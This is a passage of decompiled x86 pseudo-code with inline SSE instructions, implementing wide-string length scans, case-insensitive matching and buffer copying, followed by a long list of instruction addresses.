																	_t564 = _t469;
																	_t349 = _t469 + 2;
																	__eflags = _t349;
																	if(_t349 == 0) {
																		break;
																	}
																	__eflags =  *(_t469 + 2) & 0x0000ffff;
																	if(( *(_t469 + 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	 *_t614 = _t564;
																	_t443 = _t592;
																	_v32 = _t510;
																	while(1) {
																		_t443 = _t443 + 1;
																		_t596 = _t469 + _t443 * 2;
																		_t537 =  *_t596 & 0x0000ffff;
																		__eflags = ( *(_t349 + _t443 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																		_v48 = _t596;
																		_t538 =  <=  ? _t537 + 0x20 : _t537;
																		__eflags = ( <=  ? _t537 + 0x20 : _t537) - _v44;
																		if(( <=  ? _t537 + 0x20 : _t537) == _v44) {
																			break;
																		}
																		__eflags =  *(_t349 + _t443 * 2) & 0x0000ffff;
																		if(( *(_t349 + _t443 * 2) & 0x0000ffff) != 0) {
																			continue;
																		}
																		L96:
																		_t510 = _v32;
																		_t350 = _v28;
																		_t565 = _v36;
																		_t593 = _v24;
																		L97:
																		__eflags = _t510;
																		if(_t510 == 0) {
																			L102:
																			_t476 =  ~( ~_t510 + 0x00000007 & 0x00000007) + 0x7fffffff;
																			__eflags = _t476;
																			while(1) {
																				asm("movdqu xmm1, [esi+edx*2]");
																				asm("pcmpeqw xmm1, xmm0");
																				asm("pmovmskb eax, xmm1");
																				__eflags = _t350;
																				if(_t350 != 0) {
																					break;
																				}
																				_t510 = _t510 + 8;
																				__eflags = _t510 - _t476;
																				if(_t510 < _t476) {
																					continue;
																				}
																				__eflags = _t476 - 0x7fffffff;
																				if(_t476 >= 0x7fffffff) {
																					L108:
																					_t476 = 0x7fffffff;
																					L109:
																					_t352 = _t565 & 0x0000000f;
																					__eflags = _t352;
																					if(_t352 == 0) {
																						L114:
																						_t432 =  ~( ~_t352 + 0x00000007 & 0x00000007) + 0x7fffffff;
																						__eflags = _t432;
																						while(1) {
																							asm("movdqu xmm1, [edi+eax*2]");
																							asm("pcmpeqw xmm1, xmm0");
																							asm("pmovmskb edx, xmm1");
																							__eflags = _t510;
																							if(_t510 != 0) {
																								break;
																							}
																							_t352 = _t352 + 8;
																							__eflags = _t352 - _t432;
																							if(_t352 < _t432) {
																								continue;
																							}
																							__eflags = _t432 - 0x7fffffff;
																							if(_t432 >= 0x7fffffff) {
																								L120:
																								_t432 = 0x7fffffff;
																								L121:
																								_t594 = _a4;
																								_t518 =  *_t614 - _t565 + _t476 * 2 >> 1;
																								__eflags = _t518;
																								 *_t594 = 0;
																								_t519 =  <=  ? 0 : _t518;
																								__eflags = _t432 - _t519;
																								 *((intOrPtr*)(_t594 + 4)) = 0;
																								_t520 =  <  ? _t432 : _t519;
																								_t434 = _t432 - _t520;
																								_t566 = _t565 + _t520 * 2;
																								__eflags = _t566;
																								if(_t566 == 0) {
																									L156:
																									_push(0x80);
																									_t406 = E008A1030();
																									_t614 =  &(_t614[1]);
																									_t357 =  *_a4;
																									__eflags = _t357;
																									if(_t357 == 0) {
																										 *_t406 = 0;
																										goto L60;
																									}
																									__eflags = _t406;
																									if(_t406 == 0) {
																										L162:
																										_push(2);
																										_push(_t357);
																										E008A10B0();
																										_t614 =  &(_t614[2]);
																										goto L60;
																									}
																									_t521 =  *_t357 & 0x0000ffff;
																									 *_t406 = _t521;
																									__eflags = _t521;
																									if(_t521 == 0) {
																										goto L162;
																									}
																									_t522 = 0;
																									__eflags = 0;
																									while(1) {
																										_t522 = _t522 + 1;
																										_t479 =  *(_t357 + _t522 * 4 - 2) & 0x0000ffff;
																										 *(_t406 + _t522 * 4 - 2) = _t479;
																										__eflags = _t479;
																										if(_t479 == 0) {
																											goto L162;
																										}
																										_t480 =  *(_t357 + _t522 * 4) & 0x0000ffff;
																										 *(_t406 + _t522 * 4) = _t480;
																										__eflags = _t480;
																										if(_t480 != 0) {
																											continue;
																										}
																										goto L162;
																									}
																									goto L162;
																								}
																								_t360 =  *_t566 & 0x0000ffff;
																								__eflags = _t360;
																								if(_t360 == 0) {
																									goto L156;
																								}
																								__eflags = _t434;
																								if(_t434 != 0) {
																									L136:
																									_t176 = _t434 + 1; // 0x80000000
																									_t523 = _t176;
																									__eflags = _t523 - 0x40;
																									_t524 =  <=  ? 0x40 : _t523;
																									__eflags = _t524;
																									if(_t524 > 0) {
																										_t366 = (_t524 >> 5 >> 0x1a) + _t524 >> 6;
																										_t525 = _t524 & 0x8000003f;
																										__eflags = _t525;
																										if(_t525 < 0) {
																											_t525 = (_t525 - 0x00000001 | 0xffffffc0) + 1;
																											__eflags = _t525;
																										}
																										__eflags = _t525;
																										_t367 = _t366 + (0 | _t525 > 0x00000000);
																										 *_t614 = _t367 << 6;
																										_push(_t367 << 7);
																										_t595 = E008A1030();
																										_t614 =  &(_t614[1]);
																										_t528 =  *_a4;
																										__eflags = _t528;
																										if(_t528 == 0) {
																											__eflags = 0;
																											 *_t595 = 0;
																											goto L148;
																										} else {
																											__eflags = _t595;
																											if(_t595 == 0) {
																												L146:
																												_push(2);
																												_push(_t528);
																												E008A10B0();
																												_t614 =  &(_t614[2]);
																												L148:
																												_t529 = _a4;
																												_t529[1] =  *_t614;
																												 *_t529 = _t595;
																												L149:
																												__eflags = _t595;
																												if(_t595 == 0) {
																													goto L61;
																												}
																												_t373 = 0;
																												while(1) {
																													_t530 =  *_t566 & 0x0000ffff;
																													_t373 = _t373 + 1;
																													 *_t595 = _t530;
																													__eflags = _t434;
																													if(_t434 == 0) {
																														goto L154;
																													}
																													__eflags = _t373 - _t434;
																													if(_t373 == _t434) {
																														 *(_t595 + 2) = 0;
																														goto L61;
																													}
																													L154:
																													__eflags = _t530;
																													if(_t530 == 0) {
																														goto L61;
																													}
																													_t595 = _t595 + 2;
																													_t566 = _t566 + 2;
																													__eflags = _t566;
																												}
																											}
																											_t376 =  *_t528 & 0x0000ffff;
																											 *_t595 = _t376;
																											__eflags = _t376;
																											if(_t376 == 0) {
																												goto L146;
																											}
																											_t377 = 0;
																											__eflags = 0;
																											while(1) {
																												_t377 = _t377 + 1;
																												_t483 =  *(_t528 + _t377 * 4 - 2) & 0x0000ffff;
																												 *(_t595 + _t377 * 4 - 2) = _t483;
																												__eflags = _t483;
																												if(_t483 == 0) {
																													goto L146;
																												}
																												_t484 =  *(_t528 + _t377 * 4) & 0x0000ffff;
																												 *(_t595 + _t377 * 4) = _t484;
																												__eflags = _t484;
																												if(_t484 != 0) {
																													continue;
																												}
																												goto L146;
																											}
																											goto L146;
																										}
																									}
																									_t595 = 0;
																									goto L149;
																								}
																								_t534 = _t566 & 0x0000000f;
																								__eflags = _t534;
																								if(_t534 == 0) {
																									L129:
																									_t434 =  ~( ~_t534 + 0x00000007 & 0x00000007) + 0x7fffffff;
																									__eflags = _t434;
																									while(1) {
																										asm("movdqu xmm1, [edi+edx*2]");
																										asm("pcmpeqw xmm1, xmm0");
																										asm("pmovmskb eax, xmm1");
																										__eflags = _t360;
																										if(_t360 != 0) {
																											break;
																										}
																										_t534 = _t534 + 8;
																										__eflags = _t534 - _t434;
																										if(_t534 < _t434) {
																											continue;
																										}
																										__eflags = _t434 - 0x7fffffff;
																										if(_t434 >= 0x7fffffff) {
																											L135:
																											_t434 = 0x7fffffff;
																											goto L136;
																										} else {
																											goto L133;
																										}
																										while(1) {
																											L133:
																											__eflags =  *(_t566 + _t434 * 2) & 0x0000ffff;
																											if(( *(_t566 + _t434 * 2) & 0x0000ffff) == 0) {
																												goto L136;
																											}
																											_t434 = _t434 + 1;
																											__eflags = _t434 - 0x7fffffff;
																											if(_t434 < 0x7fffffff) {
																												continue;
																											}
																											goto L135;
																										}
																										goto L136;
																									}
																									asm("bsf ebx, eax");
																									_t434 = (_t434 >> 1) + _t534;
																									goto L136;
																								}
																								_t434 = 0;
																								__eflags = _t534 & 0x00000001;
																								if((_t534 & 0x00000001) != 0) {
																									goto L133;
																								}
																								_t534 =  ~_t534 + 0x10 >> 1;
																								__eflags = _t534;
																								while(1) {
																									_t360 =  *(_t566 + _t434 * 2) & 0x0000ffff;
																									__eflags = _t360;
																									if(_t360 == 0) {
																										goto L136;
																									}
																									_t434 = _t434 + 1;
																									__eflags = _t434 - _t534;
																									if(_t434 < _t534) {
																										continue;
																									}
																									goto L129;
																								}
																								goto L136;
																							} else {
																								goto L118;
																							}
																							while(1) {
																								L118:
																								__eflags =  *(_t565 + _t432 * 2) & 0x0000ffff;
																								if(( *(_t565 + _t432 * 2) & 0x0000ffff) == 0) {
																									goto L121;
																								}
																								_t432 = _t432 + 1;
																								__eflags = _t432 - 0x7fffffff;
																								if(_t432 < 0x7fffffff) {
																									continue;
																								}
																								goto L120;
																							}
																							goto L121;
																						}
																						asm("bsf ebx, edx");
																						_t432 = (_t432 >> 1) + _t352;
																						goto L121;
																					}
																					_t432 = 0;
																					__eflags = _t352 & 0x00000001;
																					if((_t352 & 0x00000001) != 0) {
																						goto L118;
																					}
																					_t352 =  ~_t352 + 0x10 >> 1;
																					__eflags = _t352;
																					while(1) {
																						_t510 =  *(_t565 + _t432 * 2) & 0x0000ffff;
																						__eflags = _t510;
																						if(_t510 == 0) {
																							goto L121;
																						}
																						_t432 = _t432 + 1;
																						__eflags = _t432 - _t352;
																						if(_t432 < _t352) {
																							continue;
																						}
																						goto L114;
																					}
																					goto L121;
																				} else {
																					goto L106;
																				}
																				while(1) {
																					L106:
																					__eflags =  *(_t593 + _t476 * 2) & 0x0000ffff;
																					if(( *(_t593 + _t476 * 2) & 0x0000ffff) == 0) {
																						goto L109;
																					}
																					_t476 = _t476 + 1;
																					__eflags = _t476 - 0x7fffffff;
																					if(_t476 < 0x7fffffff) {
																						continue;
																					}
																					goto L108;
																				}
																				goto L109;
																			}
																			asm("bsf ecx, eax");
																			_t476 = (_t476 >> 1) + _t510;
																			goto L109;
																		}
																		_t476 = 0;
																		__eflags = _t350;
																		if(_t350 != 0) {
																			goto L106;
																		}
																		_t510 = _v52;
																		_t441 = _t510;
																		while(1) {
																			_t350 =  *(_t593 + _t476 * 2) & 0x0000ffff;
																			__eflags = _t350;
																			if(_t350 == 0) {
																				goto L109;
																			}
																			_t476 = _t476 + 1;
																			__eflags = _t476 - _t441;
																			if(_t476 < _t441) {
																				continue;
																			}
																			goto L102;
																		}
																		goto L109;
																	}
																	_t485 = _v48;
																	_t510 = _v32;
																	_t570 = _v52;
																	_t383 = _v28;
																	while(1) {
																		_t598 = _t510;
																		__eflags = _t510;
																		if(_t510 == 0) {
																			goto L180;
																		}
																		L175:
																		_t452 = 0;
																		__eflags = _t383;
																		if(_t383 != 0) {
																			L184:
																			_v28 = _t383;
																			_t602 = _v24;
																			while(1) {
																				__eflags =  *(_t602 + _t452 * 2) & 0x0000ffff;
																				if(( *(_t602 + _t452 * 2) & 0x0000ffff) == 0) {
																					break;
																				}
																				_t452 = _t452 + 1;
																				__eflags = _t452 - 0x7fffffff;
																				if(_t452 < 0x7fffffff) {
																					continue;
																				}
																				_v24 = _t602;
																				_t384 = _v28;
																				L188:
																				_t452 = 0x7fffffff;
																				L189:
																				_v56 = _t452;
																				_t599 = 0;
																				__eflags = 0;
																				_v32 = _t510;
																				_v28 = _t384;
																				while(1) {
																					_t453 =  *(_t485 + _t599 * 2) & 0x0000ffff;
																					_t241 = _t453 - 0x61; // 0x7fffff9e
																					_t574 =  *(_v24 + _t599 * 2) & 0x0000ffff;
																					__eflags = _t241 - 0x19;
																					_t244 = _t453 - 0x20; // 0x7fffffdf
																					_t454 =  <=  ? _t244 :  *(_t485 + _t599 * 2) & 0x0000ffff;
																					_t386 = ( <=  ? _t244 :  *(_t485 + _t599 * 2) & 0x0000ffff) & 0x0000ffff;
																					__eflags = _t574 - 0x61 - 0x19;
																					_t575 =  <=  ? _t574 - 0x20 : _t574;
																					__eflags = _t386 - ( <=  ? _t574 - 0x20 : _t574);
																					if(__eflags < 0 || __eflags > 0) {
																						break;
																					}
																					__eflags = _t386;
																					if(_t386 == 0) {
																						L194:
																						_t564 =  *_t614;
																						_t592 = _t599 ^ _t599;
																						__eflags = _t592;
																						_t510 = _v32;
																						L195:
																						__eflags = _t485;
																						if(_t485 != 0) {
																							goto L91;
																						}
																						goto L196;
																					}
																					_t599 = _t599 + 1;
																					__eflags = _t599 - _v56;
																					if(_t599 < _v56) {
																						continue;
																					}
																					goto L194;
																				}
																				_t510 = _v32;
																				_t350 = _v28;
																				_t601 = _t485 + 2;
																				__eflags = _t601;
																				if(_t601 == 0) {
																					L207:
																					_t565 = _v36;
																					_t593 = _v24;
																					goto L97;
																				}
																				__eflags =  *(_t485 + 2) & 0x0000ffff;
																				if(( *(_t485 + 2) & 0x0000ffff) == 0) {
																					goto L207;
																				}
																				_v40 = _t485;
																				_t457 = 0;
																				__eflags = 0;
																				_v32 = _t510;
																				_v28 = _t350;
																				while(1) {
																					_t457 = _t457 + 1;
																					_t485 = _v40 + _t457 * 2;
																					_t387 =  *_t485 & 0x0000ffff;
																					__eflags = ( *(_t601 + _t457 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																					_t388 =  <=  ? _t387 + 0x20 : _t387;
																					__eflags = ( <=  ? _t387 + 0x20 : _t387) - _v44;
																					if(( <=  ? _t387 + 0x20 : _t387) == _v44) {
																						break;
																					}
																					__eflags =  *(_t601 + _t457 * 2) & 0x0000ffff;
																					if(( *(_t601 + _t457 * 2) & 0x0000ffff) != 0) {
																						continue;
																					}
																					goto L96;
																				}
																				_t510 = _v32;
																				_t570 = _v52;
																				_t383 = _v28;
																				_t598 = _t510;
																				__eflags = _t510;
																				if(_t510 == 0) {
																					goto L180;
																				}
																				goto L175;
																			}
																			_v24 = _t602;
																			_t384 = _v28;
																			L198:
																			__eflags = _t452;
																			if(__eflags == 0) {
																				goto L188;
																			}
																			if(__eflags > 0) {
																				goto L189;
																			}
																			_v28 = _t384;
																			_t592 = 0;
																			_t564 =  *_t614;
																			goto L195;
																		}
																		_v32 = _t510;
																		_t598 = _t570;
																		_v28 = _t383;
																		_t544 = _v24;
																		while(1) {
																			__eflags =  *(_t544 + _t452 * 2) & 0x0000ffff;
																			if(( *(_t544 + _t452 * 2) & 0x0000ffff) == 0) {
																				break;
																			}
																			_t452 = _t452 + 1;
																			__eflags = _t452 - _t570;
																			if(_t452 < _t570) {
																				continue;
																			}
																			_v24 = _t544;
																			_t510 = _v32;
																			_t383 = _v28;
																			goto L180;
																		}
																		_v24 = _t544;
																		_t510 = _v32;
																		_t384 = _v28;
																		goto L198;
																		L180:
																		_v28 = _t383;
																		_t449 =  ~( ~_t598 + 0x00000007 & 0x00000007) + 0x7fffffff;
																		__eflags = _t449;
																		_t571 = _v24;
																		while(1) {
																			asm("movdqu xmm1, [edi+esi*2]");
																			asm("pcmpeqw xmm1, xmm0");
																			asm("pmovmskb eax, xmm1");
																			__eflags = _t383;
																			if(_t383 != 0) {
																				break;
																			}
																			_t598 = _t598 + 8;
																			__eflags = _t598 - _t449;
																			if(_t598 < _t449) {
																				continue;
																			}
																			_v24 = _t571;
																			_t384 = _v28;
																			__eflags = _t449 - 0x7fffffff;
																			if(_t449 >= 0x7fffffff) {
																				goto L188;
																			}
																			goto L184;
																		}
																		asm("bsf ebx, ebx");
																		_v24 = _t571;
																		_t452 = (_t383 >> 1) + _t598;
																		_t384 = _v28;
																		goto L198;
																	}
																}
																L196:
																 *_t614 = _t564;
																_t350 = _v28;
																_t565 = _v36;
																_t593 = _v24;
																goto L97;
															}
															_t588 = _t588 + 1;
															__eflags = _t588 -  *_t614;
															if(_t588 <  *_t614) {
																continue;
															}
															goto L88;
														}
														_t513 = _v32;
														_t344 = _v28;
														_t590 = _t469 + 2;
														__eflags = _t590;
														if(_t590 == 0) {
															goto L52;
														}
														__eflags =  *(_t469 + 2) & 0x0000ffff;
														if(( *(_t469 + 2) & 0x0000ffff) == 0) {
															goto L52;
														}
														_v40 = _t469;
														_t426 = 0;
														__eflags = 0;
														_v32 = _t513;
														_v28 = _t344;
														while(1) {
															_t426 = _t426 + 1;
															_t469 = _v40 + _t426 * 2;
															_t345 =  *_t469 & 0x0000ffff;
															__eflags = ( *(_t590 + _t426 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
															_t346 =  <=  ? _t345 + 0x20 : _t345;
															__eflags = ( <=  ? _t345 + 0x20 : _t345) - _v44;
															if(( <=  ? _t345 + 0x20 : _t345) == _v44) {
																break;
															}
															__eflags =  *(_t590 + _t426 * 2) & 0x0000ffff;
															if(( *(_t590 + _t426 * 2) & 0x0000ffff) != 0) {
																continue;
															}
															goto L52;
														}
														_t510 = _v32;
														_t555 = _v52;
														_t340 = _v28;
														goto L68;
													}
													_v24 = _t603;
													_t341 = _v28;
													L166:
													__eflags = _t421;
													if(__eflags == 0) {
														goto L82;
													}
													if(__eflags > 0) {
														goto L83;
													}
													_t563 = _v36;
													_t591 = _v24;
													goto L89;
												}
												_v32 = _t510;
												_t587 = _t555;
												_v28 = _t340;
												_t546 = _v24;
												while(1) {
													__eflags =  *(_t546 + _t421 * 2) & 0x0000ffff;
													if(( *(_t546 + _t421 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t421 = _t421 + 1;
													__eflags = _t421 - _t555;
													if(_t421 < _t555) {
														continue;
													}
													_v24 = _t546;
													_t510 = _v32;
													_t340 = _v28;
													goto L74;
												}
												_v24 = _t546;
												_t510 = _v32;
												_t341 = _v28;
												goto L166;
												L74:
												_v28 = _t340;
												_t418 =  ~( ~_t587 + 0x00000007 & 0x00000007) + 0x7fffffff;
												__eflags = _t418;
												_t556 = _v24;
												while(1) {
													asm("movdqu xmm1, [edi+esi*2]");
													asm("pcmpeqw xmm1, xmm0");
													asm("pmovmskb eax, xmm1");
													__eflags = _t340;
													if(_t340 != 0) {
														break;
													}
													_t587 = _t587 + 8;
													__eflags = _t587 - _t418;
													if(_t587 < _t418) {
														continue;
													}
													_v24 = _t556;
													_t341 = _v28;
													__eflags = _t418 - 0x7fffffff;
													if(_t418 >= 0x7fffffff) {
														goto L82;
													}
													goto L78;
												}
												asm("bsf ebx, ebx");
												_v24 = _t556;
												_t421 = (_t340 >> 1) + _t587;
												_t341 = _v28;
												goto L166;
											}
										}
										goto L39;
									}
									_t395 =  *_t498 & 0x0000ffff;
									 *_t552 = _t395;
									__eflags = _t395;
									if(_t395 == 0) {
										goto L33;
									}
									_t396 = 0;
									__eflags = 0;
									while(1) {
										_t396 = _t396 + 1;
										_t488 =  *(_t498 + _t396 * 4 - 2) & 0x0000ffff;
										 *(_t552 + _t396 * 4 - 2) = _t488;
										__eflags = _t488;
										if(_t488 == 0) {
											goto L33;
										}
										_t489 =  *(_t498 + _t396 * 4) & 0x0000ffff;
										 *(_t552 + _t396 * 4) = _t489;
										__eflags = _t489;
										if(_t489 != 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
							}
							_t552 = _v64;
							goto L36;
						}
						_t398 = _t551 & 0x0000000f;
						__eflags = _t398;
						if(_t398 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t609 =  ~( ~_t398 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t609;
							while(1) {
								asm("movdqu xmm1, [edi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								__eflags = _t492;
								if(_t492 != 0) {
									break;
								}
								_t398 = _t398 + 8;
								__eflags = _t398 - _t609;
								if(_t398 < _t609) {
									continue;
								}
								__eflags = _t609 - 0x7fffffff;
								if(_t609 >= 0x7fffffff) {
									L22:
									_t459 = 0x40;
									_t581 = 0x7fffffff;
									goto L23;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *(_t551 + _t609 * 2) & 0x0000ffff;
									if(( *(_t551 + _t609 * 2) & 0x0000ffff) == 0) {
										break;
									}
									_t609 = _t609 + 1;
									__eflags = _t609 - 0x7fffffff;
									if(_t609 < 0x7fffffff) {
										continue;
									}
									goto L22;
								}
								L62:
								__eflags = _t581 - 0xfffffffe;
								if(_t581 != 0xfffffffe) {
									_t459 = 0x40;
								} else {
									 *_t551 = 0;
									_t459 = _v60;
								}
								goto L23;
							}
							asm("bsf esi, edx");
							_t581 = (_t609 >> 1) + _t398;
							goto L62;
						}
						_t609 = 0;
						__eflags = _t398 & 0x00000001;
						if((_t398 & 0x00000001) != 0) {
							goto L20;
						}
						_t398 =  ~_t398 + 0x10 >> 1;
						__eflags = _t398;
						while(1) {
							_t492 =  *(_t551 + _t609 * 2) & 0x0000ffff;
							__eflags = _t492;
							if(_t492 == 0) {
								goto L62;
							}
							_t609 = _t609 + 1;
							__eflags = _t609 - _t398;
							if(_t609 < _t398) {
								continue;
							}
							goto L16;
						}
						goto L62;
					}
					_t319 =  &_v64;
					goto L37;
				}
				if(_t551 == 0) {
					L6:
					_push(2);
					_push(_t304);
					E008A10B0();
					_t614 =  &(_t614[2]);
					goto L8;
				}
				_t492 =  *_t304 & 0x0000ffff;
				 *_t551 = _t492;
				if(_t492 == 0) {
					goto L6;
				}
				while(1) {
					_t492 = 1;
					_t490 = _t304[1] & 0x0000ffff;
					 *(_t551 + 2) = _t490;
					if(_t490 == 0) {
						goto L6;
					}
					_t491 = _t304[2] & 0x0000ffff;
					 *(_t551 + 4) = _t491;
					if(_t491 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x008ac59e
0x008ac5a2
0x008ac5a4
0x008ac5a8
0x008ac5b2
0x008ac5b4
0x008ac5b7
0x008ac5bd
0x008ac5f7
0x008ac5f9
0x008ac5fc
0x008ac600
0x008ac608
0x008ac60e
0x008ac619
0x008ac61b
0x008ad019
0x008ad01e
0x008ac69f
0x008ac6a4
0x008ac6a4
0x008ac6a7
0x008ac6aa
0x008ac6ad
0x008ac6af
0x008ac6c4
0x008ac6c7
0x008ac6c7
0x008ac6cd
0x008ac6d5
0x008ac6d5
0x008ac6d5
0x008ac6d6
0x008ac6e0
0x008ac6ea
0x008ac6ed
0x008ac6f3
0x008ac6f5
0x008ac6f8
0x008ac6fc
0x008ac6fe
0x008ac738
0x008ac73a
0x00000000
0x008ac700
0x008ac700
0x008ac702
0x008ac72b
0x008ac72b
0x008ac72d
0x008ac72e
0x008ac733
0x008ac73d
0x008ac740
0x008ac744
0x008ac748
0x008ac74c
0x008ac74e
0x008ac752
0x008ac758
0x008ac75d
0x008ac75d
0x008ac761
0x008ac76a
0x008ac76a
0x008ac76f
0x008ac774
0x008ac776
0x008ac77e
0x008ac780
0x008ac786
0x008ac78a
0x008ac7c9
0x008ac878
0x008ac878
0x008ac87b
0x008ac87d
0x008ac884
0x008ac884
0x008ac886
0x008ac88a
0x008ac894
0x008ac898
0x008ac8a8
0x008ac8a8
0x008ac78e
0x008ac7b7
0x008ac7b7
0x008ac7b9
0x008ac7ba
0x008ac7bf
0x00000000
0x008ac7bf
0x008ac790
0x008ac793
0x008ac798
0x00000000
0x00000000
0x008ac79a
0x008ac79c
0x008ac79c
0x008ac79d
0x008ac7a2
0x008ac7a9
0x00000000
0x00000000
0x008ac7ab
0x008ac7af
0x008ac7b5
0x00000000
0x00000000
0x00000000
0x008ac7b5
0x00000000
0x008ac79c
0x008ac763
0x008ac768
0x008ac7d1
0x008ac7d3
0x008ac7d5
0x008ac819
0x008ac819
0x008ac81e
0x008ac823
0x008ac825
0x008ac82d
0x008ac82f
0x008ac835
0x008ac837
0x008ac839
0x008ac873
0x008ac875
0x00000000
0x008ac875
0x008ac83b
0x008ac83d
0x008ac866
0x008ac866
0x008ac868
0x008ac869
0x008ac86e
0x00000000
0x008ac86e
0x008ac83f
0x008ac842
0x008ac845
0x008ac847
0x00000000
0x00000000
0x008ac849
0x008ac849
0x008ac84b
0x008ac84b
0x008ac84c
0x008ac851
0x008ac856
0x008ac858
0x00000000
0x00000000
0x008ac85a
0x008ac85e
0x008ac862
0x008ac864
0x00000000
0x00000000
0x00000000
0x008ac864
0x00000000
0x008ac84b
0x008ac7da
0x008ac7dc
0x00000000
0x00000000
0x008ac7de
0x008ac7e5
0x008ac7eb
0x008ac7ee
0x008ac7ee
0x008ac7f0
0x008ac7f3
0x008ac7f7
0x008ac7f7
0x008ac7fb
0x008ac7fe
0x008ac801
0x008ac804
0x008ac807
0x008ac80a
0x00000000
0x00000000
0x008ac810
0x008ac815
0x008ac817
0x00000000
0x00000000
0x00000000
0x008ac817
0x008ac8c8
0x008ac8cc
0x008ac8cf
0x008ac8d1
0x00000000
0x00000000
0x008ac8d9
0x008ac8dc
0x008ac8e6
0x008ac8ec
0x008ac8ee
0x008ac8f2
0x008ac8f6
0x008ac8fa
0x008ac90a
0x008ac90a
0x008ac90a
0x008ac90c
0x008ac90e
0x00000000
0x00000000
0x008ac910
0x008ac912
0x008ac914
0x008ac98b
0x008ac98b
0x008ac98f
0x008ac993
0x008ac997
0x008ac999
0x00000000
0x00000000
0x008ac99f
0x008ac9a0
0x008ac9a6
0x00000000
0x00000000
0x008ac9a8
0x008ac9ac
0x008ac9b0
0x008ac9b0
0x008ac9b5
0x008ac9b5
0x008ac9b8
0x008ac9b8
0x008ac9ba
0x008ac9be
0x008ac9c2
0x008ac9c2
0x008ac9ca
0x008ac9cd
0x008ac9d1
0x008ac9d4
0x008ac9d7
0x008ac9da
0x008ac9e0
0x008ac9e6
0x008ac9e9
0x008ac9ec
0x00000000
0x00000000
0x008ac9f8
0x008ac9fa
0x008aca02
0x008aca02
0x008aca06
0x008aca0a
0x008aca0e
0x008aca12
0x008aca12
0x008aca14
0x00000000
0x00000000
0x008aca1a
0x008aca1e
0x008aca22
0x008aca26
0x008aca26
0x008aca28
0x008aca28
0x008aca2a
0x008aca2c
0x008aca2c
0x008aca2f
0x00000000
0x00000000
0x008aca39
0x008aca3b
0x00000000
0x00000000
0x008aca41
0x008aca44
0x008aca46
0x008aca4a
0x008aca4a
0x008aca50
0x008aca53
0x008aca59
0x008aca5c
0x008aca67
0x008aca6a
0x008aca6d
0x00000000
0x00000000
0x008aca77
0x008aca79
0x00000000
0x00000000
0x008aca7b
0x008aca7b
0x008aca7f
0x008aca83
0x008aca87
0x008aca8b
0x008aca8b
0x008aca8d
0x008acaa8
0x008acab4
0x008acab4
0x008acaba
0x008acaba
0x008acabf
0x008acac3
0x008acac7
0x008acac9
0x00000000
0x00000000
0x008acacf
0x008acad2
0x008acad4
0x00000000
0x00000000
0x008acad6
0x008acadc
0x008acaef
0x008acaef
0x008acaf4
0x008acaf6
0x008acaf6
0x008acaf9
0x008acb15
0x008acb21
0x008acb21
0x008acb27
0x008acb27
0x008acb2c
0x008acb30
0x008acb34
0x008acb36
0x00000000
0x00000000
0x008acb3c
0x008acb3f
0x008acb41
0x00000000
0x00000000
0x008acb43
0x008acb49
0x008acb5c
0x008acb5c
0x008acb61
0x008acb66
0x008acb6e
0x008acb70
0x008acb72
0x008acb74
0x008acb77
0x008acb79
0x008acb7c
0x008acb7f
0x008acb81
0x008acb84
0x008acb86
0x008accdc
0x008accdc
0x008acce6
0x008acce8
0x008accee
0x008accf0
0x008accf2
0x008acd31
0x00000000
0x008acd31
0x008accf4
0x008accf6
0x008acd1f
0x008acd1f
0x008acd21
0x008acd22
0x008acd27
0x00000000
0x008acd27
0x008accf8
0x008accfb
0x008accfe
0x008acd00
0x00000000
0x00000000
0x008acd02
0x008acd02
0x008acd04
0x008acd04
0x008acd05
0x008acd0a
0x008acd0f
0x008acd11
0x00000000
0x00000000
0x008acd13
0x008acd17
0x008acd1b
0x008acd1d
0x00000000
0x00000000
0x00000000
0x008acd1d
0x00000000
0x008acd04
0x008acb8c
0x008acb8f
0x008acb91
0x00000000
0x00000000
0x008acb97
0x008acb99
0x008acc09
0x008acc0e
0x008acc0e
0x008acc11
0x008acc14
0x008acc17
0x008acc19
0x008acc2c
0x008acc2f
0x008acc2f
0x008acc35
0x008acc3d
0x008acc3d
0x008acc3d
0x008acc3e
0x008acc48
0x008acc52
0x008acc55
0x008acc5b
0x008acc5d
0x008acc63
0x008acc65
0x008acc67
0x008acca1
0x008acca3
0x00000000
0x008acc69
0x008acc69
0x008acc6b
0x008acc94
0x008acc94
0x008acc96
0x008acc97
0x008acc9c
0x008acca6
0x008acca6
0x008accac
0x008accaf
0x008accb1
0x008accb1
0x008accb3
0x00000000
0x00000000
0x008accb9
0x008accc3
0x008accc3
0x008accc6
0x008accc7
0x008accca
0x008acccc
0x00000000
0x00000000
0x008accce
0x008accd0
0x008acd3b
0x00000000
0x008acd3b
0x008accd2
0x008accd2
0x008accd4
0x00000000
0x00000000
0x008accbd
0x008accc0
0x008accc0
0x008accc0
0x008accc3
0x008acc6d
0x008acc70
0x008acc73
0x008acc75
0x00000000
0x00000000
0x008acc77
0x008acc77
0x008acc79
0x008acc79
0x008acc7a
0x008acc7f
0x008acc84
0x008acc86
0x00000000
0x00000000
0x008acc88
0x008acc8c
0x008acc90
0x008acc92
0x00000000
0x00000000
0x00000000
0x008acc92
0x00000000
0x008acc79
0x008acc67
0x008acc1b
0x00000000
0x008acc1b
0x008acb9d
0x008acb9d
0x008acba0
0x008acbbd
0x008acbc9
0x008acbc9
0x008acbcf
0x008acbcf
0x008acbd4
0x008acbd8
0x008acbdc
0x008acbde
0x00000000
0x00000000
0x008acbe4
0x008acbe7
0x008acbe9
0x00000000
0x00000000
0x008acbeb
0x008acbf1
0x008acc04
0x008acc04
0x00000000
0x00000000
0x00000000
0x00000000
0x008acbf3
0x008acbf3
0x008acbf7
0x008acbf9
0x00000000
0x00000000
0x008acbfb
0x008acbfc
0x008acc02
0x00000000
0x00000000
0x00000000
0x008acc02
0x00000000
0x008acbf3
0x008acd6b
0x008acd70
0x00000000
0x008acd70
0x008acba2
0x008acba4
0x008acba7
0x00000000
0x00000000
0x008acbae
